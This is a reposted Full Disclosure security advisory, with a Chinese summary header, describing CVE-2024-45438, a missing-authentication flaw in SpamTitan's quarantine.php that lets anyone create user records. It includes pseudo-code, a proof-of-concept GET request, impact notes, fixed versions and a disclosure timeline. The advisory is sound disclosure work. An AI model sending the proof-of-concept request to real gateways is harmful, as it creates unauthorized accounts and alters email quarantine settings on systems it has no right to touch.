CVE-2024-45438:SpamTitan 未认证用户创建漏洞技术分析
SpamTitan Email Security Gateway 存在高危漏洞(CVE-2024-45438),CVSS 评分 8.6 分。攻击者可通过构造 GET 请求在 quarantin.php 中创建任意用户记录,无需身份验证。此漏洞可能导致权限提升和信息泄露。已修复于版本 8.00.101 和 8.01.14。 2025-9-8 22:27:0 Author: seclists.org(查看原文) 阅读量:0 收藏
fulldisclosure logo

Full Disclosure mailing list archives

From: Seralys Research Team via Fulldisclosure <fulldisclosure () seclists org>
Date: Wed, 20 Aug 2025 14:40:55 +0000
    Seralys Security Advisory | https://www.seralys.com/research
        
======================================================================
Title:       Unauthenticated User Creation
Product:     SpamTitan Email Security Gateway
Affected:    Confirmed on 8.00.95 
Fixed in:    8.00.101 and 8.01.14
Vendor:      TitanHQ
Discovered:  May 2024
Severity:    HIGH
CWE:         CWE-306: Missing Authentication for Critical Function
CVE:         CVE-2024-45438
CVSS:        8.6 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H)
Discovered by: Philippe Caturegli (Seralys) & Julian B.

======================================================================
Overview
--------

The file `quarantine.php` within the SpamTitan interface allows 
unauthenticated users to trigger account-level actions using a crafted 
GET request. Notably, when a non-existent email address is provided as 
part of the `email` parameter, SpamTitan will automatically create a 
user record and associate quarantine settings with it - all without 
requiring authentication.

This allows an attacker to manipulate internal application behavior 
or inject data into the user base, potentially leading to privilege 
escalation paths or information leaks in misconfigured environments.

======================================================================
Technical Details
-----------------

Affected Endpoint:
------------------
`quarantine.php`

Unauthenticated request triggers user creation:
```
/quarantine.php?language=en&role_type=admin&action=setperiod&
email=admin () attacker com&period=WD&secret_id=1
```

Pseudo-code logic:
```
$email = $_GET['email'];
if (!empty($email)) {
    $user_id = db_getmaddr_id($email); 
}
```

Helper function (simplified behavior):
```
function db_getmaddr_id($email, $create = 1) {
    if (not exists in `maddr` table and $create == 1) {
        INSERT INTO maddr (email, domain)
    }
    return user_id;
}
```

- Because `db_getmaddr_id($email)` is invoked with only one argument,
  the default value `$create = 1` is used, which triggers implicit 
  user creation.
- No session or authentication checks are performed prior to 
  executing the action.
- The `role_type` parameter (e.g., `admin`) is accepted via query 
  string but never validated.

======================================================================
Proof of Concept
-----------------

Send the following GET request without authentication:

```
GET /quarantine.php?language=en&role_type=admin&action=setperiod&
email=user () attacker com&period=WD&secret_id=1 HTTP/1.1
Host: spamtitan.local
```

Effect:
- A new user `user () attacker com` is silently created.
- Digest preference is set to "weekly".
- No authentication or token is required.

======================================================================
Impact
-------

- Unauthenticated creation of internal user records
- Manipulation of quarantine report settings for arbitrary emails
- Potential for denial of service or persistence via spam report 
  hijacking
  - Expands the application attack surface for further exploitation
  
======================================================================
Vendor Response
---------------

TitanHQ implemented fixes for this vulnerability as part of a 
coordinated disclosure effort. 

The issue has been resolved in the following versions: 
- SpamTitan Gateway v.8.00.101 
- SpamTitan Gateway v.8.01.14

Note: if a customer has set the token expiration period to 0 
(disabling tokens), then it would still be possible to add users. 
The quarantine settings page now shows a warning if a customer has 
this set to 0, and going forward it is not possible to set the token 
expiration period lower than 1

======================================================================
Timeline
--------

- 2024-05-12: Vulnerability discovered during a pentest
- 2025-04-28: Advisory drafted (we kind of forgot about that vuln :))
- 2025-04-28: Initial advisory submitted to TitanHQ
- 2025-05-06: Follow up #1 from Seralys
- 2025-05-16: Follow up #2 from Seralys
- 2025-05-19: TitanHQ acknowledged receipt and initiated coordination
- 2025-06-13: TitanHQ publicly released a fix in v 8.00.101 and 8.01.14
- 2025-08-20: Public disclosure by Seralys

======================================================================
About Seralys
--------------

Seralys is a boutique penetration testing firm with offices in Europe
and North America. We provide high value-add penetration testing and 
security assessments.

https://www.seralys.com

======================================================================
Acknowledgments
---------------

Special shoutout to our fellow researchers at BastardLabs. \m/

======================================================================
Disclaimer
----------

This advisory is provided for coordinated disclosure purposes only.
Reproduction or distribution for malicious use is strictly prohibited.

EOF
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

  • CVE-2024-45438 - SpamTitan Unauthenticated User Creation Seralys Research Team via Fulldisclosure (Sep 08)

文章来源: https://seclists.org/fulldisclosure/2025/Sep/15
如有侵权请联系:admin#unsafe.sh